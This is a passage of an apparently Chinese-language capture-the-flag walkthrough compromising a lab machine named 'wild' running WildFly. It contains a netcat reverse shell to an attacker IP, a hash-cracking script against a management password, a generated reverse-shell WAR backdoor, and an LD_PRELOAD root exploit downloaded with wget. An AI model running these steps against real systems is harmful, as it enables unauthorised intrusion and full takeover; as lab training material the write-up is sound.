\u51fa\u73b0www-data<\/code>\uff0c\u5c1d\u8bd5\u53cd\u5f39shell\uff1a<\/p>\nnc -e \/bin\/bash 10.160.220.139 1234<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u6269\u5c55shell<\/h3>\npython3 -c 'import pty;pty.spawn("\/bin\/bash")'<\/code><\/pre>\n\u4fe1\u606f\u641c\u96c6<\/h3>\nwww-data@wild:\/var\/www\/html$ whoami;id\nwhoami;id\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\nwww-data@wild:\/var\/www\/html$ ls -la\nls -la\ntotal 68\ndr-xr-xr-x 7 root root 4096 Nov 4 14:01 .\ndrwxr-xr-x 3 root root 4096 Nov 1 09:49 ..\ndrwxrwxr-x 3 www-data www-data 4096 Nov 1 19:24 __MACOSX\n-rwx------ 1 www-data www-data 22 Nov 1 19:24 about.php\n-rwx------ 1 www-data www-data 1586 Nov 1 19:24 cheddar-burger.php\ndrwxr-xr-x 2 www-data www-data 4096 Nov 1 19:24 css\n-rwx------ 1 www-data www-data 1897 Nov 1 19:24 fatty-burger.php\ndrwxr-xr-x 2 www-data www-data 4096 Nov 1 19:24 fonts\ndrwxr-xr-x 2 www-data www-data 4096 Nov 1 19:24 images\n-rwx------ 1 www-data www-data 19390 Nov 1 19:24 index.php\ndrwxr-xr-x 2 www-data www-data 4096 Nov 1 19:24 js\n-rwx------ 1 www-data www-data 2626 Nov 1 19:24 recipe.php\n-rwx------ 1 www-data www-data 1582 Nov 1 19:24 shack-burger.php\nwww-data@wild:\/var\/www\/html$ cd ..\/\ncd ..\/\nwww-data@wild:\/var\/www$ ls -la\nls -la\ntotal 12\ndrwxr-xr-x 3 root root 4096 Nov 1 09:49 .\ndrwxr-xr-x 12 root root 4096 Oct 23 09:25 ..\ndr-xr-xr-x 7 root root 4096 Nov 4 14:01 html\nwww-data@wild:\/var\/www$ cd ..\/;ls -la\ncd ..\/;ls -la\ntotal 48\ndrwxr-xr-x 12 root root 4096 Oct 23 09:25 .\ndrwxr-xr-x 18 root root 4096 Jul 22 2023 ..\ndrwxr-xr-x 2 root root 4096 Nov 3 09:31 backups\ndrwxr-xr-x 14 root root 4096 Oct 23 12:28 cache\ndrwxr-xr-x 35 root root 4096 Oct 23 12:28 lib\ndrwxrwsr-x 2 root staff 4096 Mar 2 2023 local\nlrwxrwxrwx 1 root root 9 Jun 15 2023 lock -> \/run\/lock\ndrwxr-xr-x 9 root root 4096 Mar 29 04:30 log\ndrwxrwsr-x 2 root mail 4096 Jun 15 2023 mail\ndrwxr-xr-x 2 root root 4096 Jun 15 2023 opt\nlrwxrwxrwx 1 root root 4 Jun 15 2023 run -> \/run\ndrwxr-xr-x 4 root root 4096 Jun 15 2023 spool\ndrwxrwxrwt 2 root root 4096 Mar 29 05:35 tmp\ndrwxr-xr-x 3 root root 4096 Nov 1 09:49 www\nwww-data@wild:\/var$ mail\nmail\nbash: mail: command not found\nwww-data@wild:\/var$ find \/ -perm -u=s -type f 2>\/dev\/null\nfind \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/bin\/gpasswd\n\/usr\/bin\/passwd\n\/usr\/bin\/sudo\n\/usr\/bin\/newgrp\n\/usr\/bin\/chsh\n\/usr\/bin\/su\n\/usr\/bin\/mount\n\/usr\/bin\/chfn\n\/usr\/bin\/umount\n\/usr\/sbin\/pppd\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/polkit-1\/polkit-agent-helper-1\nwww-data@wild:\/var$ cat cron*\ncat cron*\ncat: 'cron*': No such file or directory\nwww-data@wild:\/var$ cat \/etc\/cron*\ncat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\ncat: \/etc\/cron.weekly: Is a directory\ncat: \/etc\/cron.yearly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don't have to run the `crontab'\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# | .------------- hour (0 - 23)\n# | | .---------- day of month (1 - 31)\n# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...\n# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# | | | | |\n# * * * * * user-name command to be executed\n17 * * * * root cd \/ && run-parts --report \/etc\/cron.hourly\n25 6 * * * root test -x \/usr\/sbin\/anacron || { cd \/ && run-parts --report \/etc\/cron.daily; }\n47 6 * * 7 root test -x \/usr\/sbin\/anacron || { cd \/ && run-parts --report \/etc\/cron.weekly; }\n52 6 1 * * root test -x \/usr\/sbin\/anacron || { cd \/ && run-parts --report \/etc\/cron.monthly; }<\/code><\/pre>\n\u6bdb\u90fd\u6ca1\u6709\uff0c\u7ee7\u7eed\u627e\u5176\u4ed6\u7528\u6237\u5427\uff0c\u67e5\u770b\u4e00\u4e0b8080<\/code>\u7aef\u53e3\uff1a<\/p>\n\u5bfb\u627e\u914d\u7f6e\u6587\u4ef6<\/h3>\n\nWildFly\u662f\u4e00\u4e2a\u57fa\u4e8eJavaEE\u7684\u5f00\u6e90\u8f7b\u91cf\u7ea7\u5e94\u7528\u670d\u52a1\u5668<\/strong>\u3002\u5b83\u63d0\u4f9b\u4e86\u8fd0\u884cJava Web\u5e94\u7528\u7a0b\u5e8f\u6240\u9700\u7684\u6240\u6709\u529f\u80fd\uff0c\u662fJVM\u7684\u6269\u5c55\uff0c\u5177\u6709\u5b8c\u6574\u7684\u8fd0\u884c\u65f6\u73af\u5883\uff0c\u80fd\u591f\u5728\u4e00\u7aef\u521b\u5efa\u6570\u636e\u5e93\u5230\u53e6\u4e00\u7aef\u7684Web\u5ba2\u6237\u7aef\u7684\u8fde\u63a5\u3002WildFly\u7531Red Hat\u8bbe\u8ba1\u548c\u7ef4\u62a4\uff0c\u5176\u6b63\u5f0f\u540d\u79f0\u4e3aJBoss AS\u3002<\/p>\n\u4f5c\u4e3a\u4e00\u4e2a\u5168\u529f\u80fd\u7684\u5e94\u7528\u670d\u52a1\u5668\uff0cWildFly\u5177\u6709\u65e0\u4e0e\u4f26\u6bd4\u7684\u901f\u5ea6\uff0c\u5305\u62ec\u5feb\u901f\u542f\u52a8\u3001\u65e0\u9650\u7684\u7f51\u7edc\u6027\u80fd\u548c\u53ef\u6269\u5c55\u6027\u3002\u540c\u65f6\uff0c\u5b83\u975e\u5e38\u8f7b\u91cf\u7ea7\uff0c\u5177\u6709\u7626\u5185\u5b58\u7ba1\u7406\u548c\u53ef\u5b9a\u5236\u7684\u8fd0\u884c\u65f6\u95f4\u3002WildFly\u8fd8\u5177\u6709\u5f3a\u5927\u7684\u7ba1\u7406\u80fd\u529b\uff0c\u5305\u62ec\u7edf\u4e00\u7684\u914d\u7f6e\u548c\u7ba1\u7406\u3002\u8fd9\u4e9b\u7279\u70b9\u4f7f\u5f97WildFly\u80fd\u591f\u7f29\u77ed\u5f00\u53d1\u65f6\u95f4\uff0c\u66f4\u6709\u6548\u5730\u7ba1\u7406\u8d44\u6e90\uff0c\u5e76\u4e3a\u7528\u6237\u8282\u7701\u8d44\u91d1\u3002<\/p>\n
\u6b64\u5916\uff0cWildFly\u662f\u4e00\u4e2a\u7075\u6d3b\u7684\u5bb9\u5668\u548c\u670d\u52a1\u5668\uff0c\u7528\u4e8e\u7ba1\u7406EJB\uff0c\u4f46JBoss\u6838\u5fc3\u670d\u52a1\u5e76\u4e0d\u5305\u62ec\u652f\u6301servlet\/JSP\u7684WEB\u5bb9\u5668\uff0c\u56e0\u6b64\u4e00\u822c\u4e0eTomcat\u6216Jetty\u7ed1\u5b9a\u4f7f\u7528\u3002\u603b\u7684\u6765\u8bf4\uff0cWildFly\u4e3aJava Web\u5e94\u7528\u7a0b\u5e8f\u7684\u5f00\u53d1\u548c\u90e8\u7f72\u63d0\u4f9b\u4e86\u4e00\u4e2a\u5f3a\u5927\u7684\u3001\u7075\u6d3b\u7684\u548c\u5f00\u6e90\u7684\u5e73\u53f0\u3002<\/p>\n<\/blockquote>\n
\u6709\u4e00\u4e2a\u767b\u5f55\u754c\u9762\u9700\u8981\u8d26\u53f7\u5bc6\u7801\uff0c\u800c\u524d\u9762\u53c8\u6709\u4e00\u4e2a\u6587\u4ef6\u5305\u542b\uff0c\u81ea\u7136\u800c\u7136\u60f3\u5230\u53bb\u8bfb\u53d6\u914d\u7f6e\u6587\u4ef6\uff0c\u6240\u4ee5\u6211\u4eec\u8981\u7ffb\u770b\u624b\u518c\u627e\u4e00\u4e0b\u914d\u7f6e\u6587\u4ef6\u5728\u54ea\uff0c\u6216\u8005\u76f4\u63a5google\uff1a<\/p>\n
<\/div>
\n<\/div>
\n<\/div><\/p>\n\u5f97\u5230\u4e86\u4e00\u4e2a\u5927\u6982\u7684\u5730\u5740\uff1a<\/p>\n
\\{ jboss.home}\/standalone\/configuration\/mgmt-users.properties\n \\{ jboss.home}\/domain\/configuration\/mgmt-users.properties<\/code><\/pre>\n\u4e4b\u524d\u6211\u4eec\u62ff\u5230\u4e86shell\uff0c\u5c1d\u8bd5\u641c\u7d22\u4e00\u4e0b\u76f8\u5173\u6587\u4ef6\uff1a<\/p>\n
find \/ -name mgmt-users.properties 2>\/dev\/null\n# \/opt\/wildfly\/standalone\/configuration\/mgmt-users.properties\n# \/opt\/wildfly\/domain\/configuration\/mgmt-users.properties<\/code><\/pre>\n\n\u8fd9\u91cc\u5982\u679c\u6743\u9650\u5b9e\u5728\u4e0d\u591f\uff0c\u5c31\u5728\/etc<\/code>\u548c\/opt<\/code>\u5206\u522b\u641c\u7d22<\/p>\n<\/blockquote>\n\u76f4\u63a5\u8bfb\u53d6\uff1a<\/p>\n
<\/wildfly\/domain\/configuration\/mgmt-users.properties\n#\n# Properties declaration of users for the realm 'ManagementRealm' which is the default realm\n# for new installations. Further authentication mechanism can be configured\n# as part of the <management \/> in host.xml.\n#\n# Users can be added to this properties file at any time, updates after the server has started\n# will be automatically detected.\n#\n# By default the properties realm expects the entries to be in the format: -\n# username=HEX( MD5( username ':' realm ':' password))\n#\n# A utility script is provided which can be executed from the bin folder to add the users: -\n# - Linux\n# bin\/add-user.sh\n#\n# - Windows\n# bin\\add-user.bat\n#\n#$REALM_NAME=ManagementRealm$ This line is used by the add-user utility to identify the realm name already used in this file.\n#\n# On start-up the server will also automatically add a user $local - this user is specifically\n# for local tools running against this AS installation.\n#\n# The following illustrates how an admin user could be defined, this\n# is for illustration only and does not correspond to a usable password.\n#\nadministrator=3bfa7f34174555fe766d0e0295821742<\/code><\/pre>\nhash\u78b0\u649e\u5f97\u5230\u5bc6\u7801<\/h3>\n
\u7528\u6237\u540d\u548c\u57df\u90fd\u7ed9\u4e86\uff1a<\/p>\n
username administrator\nrealm ManagementRealm<\/code><\/pre>\n\u5c1d\u8bd5\u7f16\u5199\u811a\u672c\uff0c\u5bf9\u8fd9\u4e2a hash \u8fdb\u884c\u78b0\u649e\uff0c\u8001\u6837\u5b50\uff0c\u4f7f\u7528rockyou<\/code>\u4f5c\u4e3a\u5b57\u5178\uff1a<\/p>\nimport hashlib\n\nusername = "administrator"\nrealm = "ManagementRealm"\ntarget_hash = "3bfa7f34174555fe766d0e0295821742"\n\nwith open('rockyou.txt','r', errors = "ignore") as dic:\n for i in dic:\n i = i.strip()\n if hashlib.md5(f"{username}:{realm}:{i}".encode()).hexdigest() == target_hash:\n print("[+] I got it!",i)\n break<\/code><\/pre>\n<\/div><\/p>\nkatarina9<\/code><\/pre>\n\u767b\u5f55\u4e00\u4e0b\uff1a<\/p>\n
<\/div><\/p>\n\u4e0a\u4f20war\u9a6c\uff08\u6c83\u5c14\u739b\uff1f\uff09<\/h3>\n
\u627e\u5230\u4e00\u5904\u4e0a\u4f20\u5730\u65b9\uff1a<\/p>\n
<\/div><\/p>\n\u4f3c\u4e4e\u4e0a\u4f20war<\/code>\uff0c\u76f4\u63a5\u4f7f\u7528\u4e4b\u524d\u7684\u8681\u5251war\u9a6c\uff0c\u53d1\u73b0\u5220\u6389\u4e86\uff0c\u4f7f\u7528\u5de5\u5177\u751f\u6210\u4e00\u4e2a\uff1a<\/p>\ngodofwar -p reverse_shell -H 10.160.220.139 -P 1234 -o wild<\/code><\/pre>\n[ \u2139 ] Creating Directory Structure:\n \u2714 wild\n \u2714 wild\/WEB-INF\n \u2714 wild\/META-INF\n \u2714 wild\/WEB-INF\/web.xml\n \u2714 wild\/META-INF\/MANIFEST.MF\n[ \u2139 ] Setting up payload:\n \u2714 reverse_shell.jsp \u27ff wild.jsp\n \u2714 wild\/wild.jsp\n[ \u2139 ] Cleaning up\n[ \u2714 ] Backdoor wild.war has been created.<\/code><\/pre>\n\u4e0a\u4f20\uff1a<\/p>\n
<\/div><\/p>\n\u8bbf\u95ee\u89e6\u53d1\uff1a<\/p>\n
<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u6269\u5c55shell<\/h3>\npython3 -V\n# Python 3.11.2\npython3 -c 'import pty;pty.spawn("\/bin\/bash")'\n# tod@wild:\/opt\/wildfly\/bin$ <\/code><\/pre>\n\u4fe1\u606f\u641c\u96c6<\/h3>\ntod@wild:\/opt\/wildfly\/bin$ whoami;id\nwhoami;id\ntod\nuid=1002(tod) gid=1002(tod) groups=1002(tod),100(users)\ntod@wild:\/opt\/wildfly\/bin$ sudo -l\nsudo -l\nMatching Defaults entries for tod on wild:\n env_reset, mail_badpass,\n secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin,\n use_pty\n\nUser tod may run the following commands on wild:\n (ALL : ALL) SETENV: NOPASSWD: \/usr\/bin\/info\ntod@wild:\/opt\/wildfly\/bin$ cd \/usr\/bin\ncd \/usr\/bin\ntod@wild:\/usr\/bin$ file info\nfile info\ninfo: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=62cd90c757a2254b5e4ead585f3564d47fa0c86f, for GNU\/Linux 3.2.0, stripped<\/code><\/pre>\n\u4f20\u8fc7\u6765\u770b\u770b\uff1a<\/p>\n
python3 -m http.server 8888\nwget http:\/\/10.161.16.19:8888\/info -O "$env:USERPROFILE\\Desktop\\info"<\/code><\/pre>\n<\/div><\/p>\n\u9006\u5411\u5206\u6790<\/h3>\n
ida64<\/code>\u6253\u5f00\u770b\u4e00\u4e0b\uff0c\u6211\u6ef4\u4e2a\u4e56\u4e56\uff0c1000\u591a\u884c\uff1a<\/p>\n<\/div><\/p>\n\u679c\u65ad\u653e\u5f03\uff0c\u8fd0\u884c\u4e00\u4e0b\u8bd5\u8bd5\uff1a<\/p>\n
.\/info\ninfo: Terminal type '(null)' is not smart enough to run Info<\/code><\/pre>\n\u91cd\u65b0\u56de\u987e\u4e00\u4e0b\uff0c\u53d1\u73b0\u53ef\u4ee5\u8bbe\u7f6e\u73af\u5883\u53d8\u91cf\uff08setenv<\/code>\uff09<\/p>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n
\u5148\u770b\u770b\u73af\u5883\u53d8\u91cf\u4ee5\u53ca\u5176\u4ed6\u7684\u4fe1\u606f\u5427\uff1a<\/p>\n
echo $PATH\nfind \/ -type -writables 2>\/dev\/null<\/code><\/pre>\n\u4f3c\u4e4e\u6ca1\u6709\u5565\u6709\u7528\u7684\u7ebf\u7d22\u3002<\/p>\n
\u52ab\u6301\u94fe\u63a5\u5e93<\/h3>\n
\u5c1d\u8bd5\u67e5\u770b\u4e00\u4e0b\u8fd9\u4e2asetenv<\/code>\u662f\u5426\u53ef\u4ee5\u5229\u7528\uff1ahttps:\/\/book.hacktricks.xyz\/linux-hardening\/privilege-escalation#setenv<\/a><\/p>\n\nLD_PRELOAD<\/strong>\u73af\u5883\u53d8\u91cf\u7528\u4e8e\u6307\u5b9a\u52a0\u8f7d\u7a0b\u5e8f\u5728\u6240\u6709\u5176\u4ed6\u5e93\uff08\u5305\u62ec\u6807\u51c6 C \u5e93 ( libc.so<\/code>)\uff09\u4e4b\u524d\u52a0\u8f7d\u4e00\u4e2a\u6216\u591a\u4e2a\u5171\u4eab\u5e93\uff08.so \u6587\u4ef6\uff09\u3002\u6b64\u8fc7\u7a0b\u79f0\u4e3a\u9884\u52a0\u8f7d\u5e93\u3002<\/p>\n\u4f46\u662f\uff0c\u4e3a\u4e86\u7ef4\u62a4\u7cfb\u7edf\u5b89\u5168\u5e76\u9632\u6b62\u6b64\u529f\u80fd\u88ab\u5229\u7528\uff0c\u7279\u522b\u662f\u5bf9\u4e8esuid\/sgid<\/strong>\u53ef\u6267\u884c\u6587\u4ef6\uff0c\u7cfb\u7edf\u4f1a\u5f3a\u5236\u6267\u884c\u67d0\u4e9b\u6761\u4ef6\uff1a<\/p>\n\n- \u5bf9\u4e8e\u771f\u5b9e\u7528\u6237 ID ( ruid ) \u4e0e\u6709\u6548\u7528\u6237 ID (<\/em> euid<\/em> )\u4e0d\u5339\u914d\u7684\u53ef\u6267\u884c\u6587\u4ef6\uff0c\u52a0\u8f7d\u7a0b\u5e8f\u4f1a\u5ffd\u7565LD_PRELOAD<\/strong>\u3002<\/li>\n
- \u5bf9\u4e8e\u5177\u6709 suid\/sgid \u7684\u53ef\u6267\u884c\u6587\u4ef6\uff0c\u4ec5\u9884\u52a0\u8f7d\u6807\u51c6\u8def\u5f84\u4e2d\u4e5f\u662f suid\/sgid \u7684\u5e93\u3002<\/li>\n<\/ul>\n<\/blockquote>\n
\u521b\u5efa\u6076\u610f\u4ee3\u7801<\/h4>\n#include <stdio.h>\n#include <sys\/types.h>\n#include <stdlib.h>\n\nvoid _init() {\n unsetenv("LD_PRELOAD");\n setgid(0);\n setuid(0);\n system("\/bin\/bash");\n}<\/code><\/pre>\n\u7f16\u8bd1\u5e76\u4f20\u81f3\u9776\u673a\uff1a<\/p>\n
# kali\nvim exp.c\ngcc -fPIC -shared -o exp.so exp.c -nostartfiles\n# exp.c: In function \u2018_init\u2019:\n# exp.c:7:5: warning: implicit declaration of function \u2018setgid\u2019 [-Wimplicit-function-declaration]\n# 7 | setgid(0);\n# | ^~~~~~\n# exp.c:8:5: warning: implicit declaration of function \u2018setuid\u2019 [-Wimplicit-function-declaration]\n# 8 | setuid(0);\n# | ^~~~~~\npython3 -m http.server 8888<\/code><\/pre>\n# tod\ncd \/tmp\nwget http:\/\/10.160.220.139:8888\/exp.so\nsudo LD_PRELOAD=.\/exp.so \/usr\/bin\/info<\/code><\/pre>\n\u62ff\u5230root\uff01<\/p>\n
<\/div><\/p>\nd8592e5a179d4b80e099f4c9a460c6e4<\/code><\/pre>\n\u518d\u56de\u5934\u627e\u4e00\u4e0buserflag\uff1a<\/p>\n
root@wild:~# cd \/home\ncd \/home\nroot@wild:\/home# ls\nls\ntod\nroot@wild:\/home# cd tod;ls -la\ncd tod;ls -la\ntotal 40\ndrwx------ 5 tod tod 4096 Nov 4 14:08 .\ndrwxr-xr-x 3 root root 4096 Oct 13 07:16 ..\n-rw-r--r-- 1 tod tod 220 Oct 12 19:59 .bash_logout\n-rw-r--r-- 1 tod tod 3526 Oct 12 19:59 .bashrc\ndrwx------ 3 tod tod 4096 Nov 1 18:11 .gnupg\ndrwxr-xr-x 12 tod tod 4096 Oct 12 20:00 .oh-my-zsh\n-rw-r--r-- 1 tod tod 807 Oct 12 19:59 .profile\ndrwx------ 2 tod tod 4096 Nov 4 13:51 .ssh\n-rwx------ 1 tod tod 33 Nov 1 19:05 user.txt\n-rw-r--r-- 1 tod tod 3890 Oct 12 19:59 .zshrc\nroot@wild:\/home\/tod# cat user.txt\ncat user.txt\nc1cc7f5179a168ec93095695f20c9e3f<\/code><\/pre>\n\u53c2\u8003blog<\/h2>\n
https:\/\/www.anquanke.com\/post\/id\/202510<\/a><\/p>\n
![\"image-20240329115037536\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403291536855.png\")
<\/div><\/p>\n![\"image-20240329115326737\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403291536856.png\")
<\/div><\/p>\n![\"image-20240329115301679\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403291536858.png\")
<\/div><\/p>\n![\"image-20240329120708746\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403291536859.png\")
<\/div><\/p>\n![\"image-20240329120344180\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403291536860.png\")
<\/div><\/p>\n![\"image-20240329124250030\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403291536861.png\")
<\/div><\/p>\n![\"image-20240329124531893\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403291536862.png\")
<\/div><\/p>\n![\"image-20240329133856066\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403291536863.png\")
<\/div><\/p>\n![\"image-20240329135956635\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403291536864.png\")
<\/div>![\"image-20240329140011149\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403291536865.png\")
<\/div>![\"image-20240329140201916\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403291536866.png\")
<\/div><\/p>\n![\"image-20240329144501696\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403291536867.png\")
<\/div><\/p>\n![\"image-20240329144630002\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403291536868.png\")
<\/div><\/p>\n![\"image-20240329144730391\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403291536869.png\")
<\/div><\/p>\n![\"image-20240329145851784\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403291536870.png\")
<\/div><\/p>\n![\"image-20240329150023470\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403291536871.png\")
<\/div><\/p>\n![\"image-20240329150948011\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403291536872.png\")
<\/div><\/p>\n![\"image-20240329151142021\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403291536873.png\")
<\/div><\/p>\n![\"image-20240329153522351\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403291536874.png\")
<\/div><\/p>\n